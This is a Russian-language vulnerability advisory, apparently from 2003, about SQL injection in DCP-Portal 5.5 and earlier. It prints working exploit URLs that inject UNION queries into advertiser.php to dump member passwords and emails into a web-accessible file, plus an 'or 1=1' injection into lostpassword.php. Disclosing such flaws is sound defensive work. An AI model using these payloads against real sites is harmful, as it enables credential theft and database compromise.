Security Lab

Sql инъекция в DCP-Portal

Дата публикации:03.10.2003
Всего просмотров:1636
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: DCP-Portal 5.5 и более ранние версии

Описание: Уязвимость обнаружена в DCP-Portal 5.x. Удаленный атакующий может выполнить произвольный SQL код на основной базе данных.

DCP-Portal не проверяет данные, представленные пользователем, перед передачей их к динамическому SQL запросу в различных параметрах и сценариях. В результате удаленный пользователь может манипулировать SQL запросом, чтобы обойти идентификацию, манипулировать данными и извлекать произвольные данные.

Пример/Эксплоит:

http://localhost/dcp/advertiser.php?adv_logged=1&username=1&password=qwe' or 
1=1 UNION select uid,name,password,surname,job,email from dcp5_members 
into outfile 'c:/apache2/htdocs/dcpad.txt

http://localhost/dcp/advertiser.php?adv_logged=1&username=1&password=qwe' or 
1=1 UNION select uid,name,password,surname,job,email from dcp5_members
into outfile '/var/www/html/dcpad.txt

http://localhost/dcp/lostpassword.php?action=lost&email=fake' or 1=1--'

URL производителя: http://www.dcp-portal.com

Решение:Включите magic_quotes_gpc в php.ini файле.

Ссылки: DCP Portal - 5.5 holes